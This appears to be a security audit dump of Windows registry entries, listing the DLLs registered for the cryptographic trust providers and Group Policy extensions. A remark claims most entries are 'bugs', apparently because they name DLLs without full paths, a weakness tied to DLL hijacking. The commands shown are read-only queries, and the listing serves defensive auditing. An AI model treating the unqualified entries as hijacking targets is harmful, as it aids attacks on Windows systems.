HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsec.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsecimpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\urlmon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\ieframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.4.1.311.10.3.3 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.2 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\2.16.840.1.113730.4.1 $DLL REG_SZ WINTRUST.DLL End of search: 97 match(es) found.Note: only 116 of these 304 entries comply with Microsoft’s own recommendation and security guidance, while the other 188 entries show a total number of 188 bugs!
Group Policy client side extensions:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" /F "D*Name" /S REM REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" /S /V "DisplayName" REM REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" /S /V "DllName"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{0ACDD40C-75AC-47ab-BAA0-BF6DE7E7FE63} DisplayName REG_EXPAND_SZ @wlgpclnt.dll,-100 DllName REG_EXPAND_SZ wlgpclnt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{0E28E245-9368-4853-AD84-6DA3BA35BB75} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-1 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{169EBF44-942F-4C43-87CE-13C93996EBBE} DllName REG_EXPAND_SZ AppManagementConfiguration.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{16be69fa-4209-4250-88cb-716cf41954e0} DisplayName REG_EXPAND_SZ @auditcse.dll,-4000 DllName REG_EXPAND_SZ auditcse.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{17D89FEC-5C44-4972-B12D-241CAEF74509} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-2 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{1A6364EB-776B-4120-ADE1-B63A406A76B5} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-3 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861} DisplayName REG_EXPAND_SZ @fdeploy.dll,-261 DllName REG_EXPAND_SZ fdeploy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{2A8FDC61-2347-4C87-92F6-B05EB91A201A} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-22 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{2BFCC077-22D2-48DE-BDE1-2F618D9B476D} DllName REG_EXPAND_SZ AppManagementConfiguration.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66} DisplayName REG_EXPAND_SZ @%SystemRoot%\System32\dskquota.dll,-100 DllName REG_EXPAND_SZ %SystemRoot%\System32\dskquota.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3A0DBA37-F8B2-4356-83DE-3E90BD5C261F} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-4 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{426031c0-0b47-4852-b0ca-ac3d37bfcb39} DisplayName REG_EXPAND_SZ @gptext.dll,-201 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{42B5FAAE-6536-11d2-AE5A-0000F87571E3} DisplayName REG_EXPAND_SZ @gpscript.dll,-1 DllName REG_SZ C:\Windows\System32\gpscript.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4B7C3B0F-E993-4E06-A241-3FBE06943684} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-22 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4bcd6cde-777b-48b6-9804-43568e23545d} DisplayName REG_EXPAND_SZ @%SystemRoot%\System32\TsUsbRedirectionGroupPolicyExtension.dll,-100 DllName REG_EXPAND_SZ %SystemRoot%\System32\TsUsbRedirectionGroupPolicyExtension.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4CFB60C1-FAA6-47f1-89AA-0B18730C9FD3} DisplayName REG_SZ @C:\Windows\System32\iedkcs32.dll,-3051 DllName REG_SZ C:\Windows\System32\iedkcs32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4D2F9B6F-1E52-4711-A382-6A8B1A003DE6} DllName REG_SZ C:\Windows\System32\tsworkspace.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4d968b55-cac2-4ff5-983f-0a54603781a3} DisplayName REG_EXPAND_SZ @WorkFoldersGPExt.dll,-261 DllName REG_EXPAND_SZ WorkFoldersGPExt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{5794DAFD-BE60-433f-88A2-1A31939AC01F} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-5 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6232C319-91AC-4931-9385-E70C2B099F0E} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-6 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6A4C88C6-C502-4f74-8F60-2CB23EDC24E2} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-7 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7150F9BF-48AD-4da4-A49C-29EF4A8369BA} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-8 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{728EE579-943C-4519-9EF7-AB56765798ED} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-9 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{74EE6C03-5363-4554-B161-627540339CAB} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-10 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7909AD9E-09EE-4247-BAB9-7029D5F0A278} DllName REG_EXPAND_SZ dmenrollengine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7933F41E-56F8-41d6-A31C-4148A711EE93} DllName REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7B849a69-220F-451E-B3FE-2CB811AF94AE} DisplayName REG_SZ @C:\Windows\System32\iedkcs32.dll,-3051 DllName REG_SZ C:\Windows\System32\iedkcs32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A} DisplayName REG_EXPAND_SZ @(runtime.system32)\scecli.dll,-7650 DllName REG_EXPAND_SZ scecli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{8A28E2C5-8D06-49A4-A08C-632DAA493E17} DisplayName REG_EXPAND_SZ @%systemroot%\system32\gpprnext.dll,-1 DllName REG_EXPAND_SZ %systemroot%\system32\gpprnext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{91FBB303-0CD5-4055-BF42-E512A681B325} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-11 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A3F3E39B-5D83-4940-B954-28315B82F0A8} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-12 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{AADCED64-746C-4633-A97C-D61349046527} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-13 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B087BE9D-ED37-454f-AF9C-04291E351182} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-14 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053} DisplayName REG_EXPAND_SZ @dot3gpclnt.dll,-100 DllName REG_EXPAND_SZ dot3gpclnt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{BA649533-0AAC-4E04-B9BC-4DBAE0325B12} DllName REG_EXPAND_SZ pwlauncher.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{BC75B1ED-5833-4858-9BB8-CBF0B166DF9D} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-16 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C34B2751-1CF4-44F5-9262-C3FC39666591} DllName REG_EXPAND_SZ pwlauncher.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C418DD9D-0D14-4efb-8FBF-CFE535C8FAC7} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-17 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8} DllName REG_EXPAND_SZ %SystemRoot%\System32\cscobj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7} DisplayName REG_EXPAND_SZ @appmgmts.dll,-3252 DllName REG_EXPAND_SZ appmgmts.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{cdeafc3d-948d-49dd-ab12-e578ba4af7aa} DisplayName REG_EXPAND_SZ @gptext.dll,-204 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D} DisplayName REG_SZ 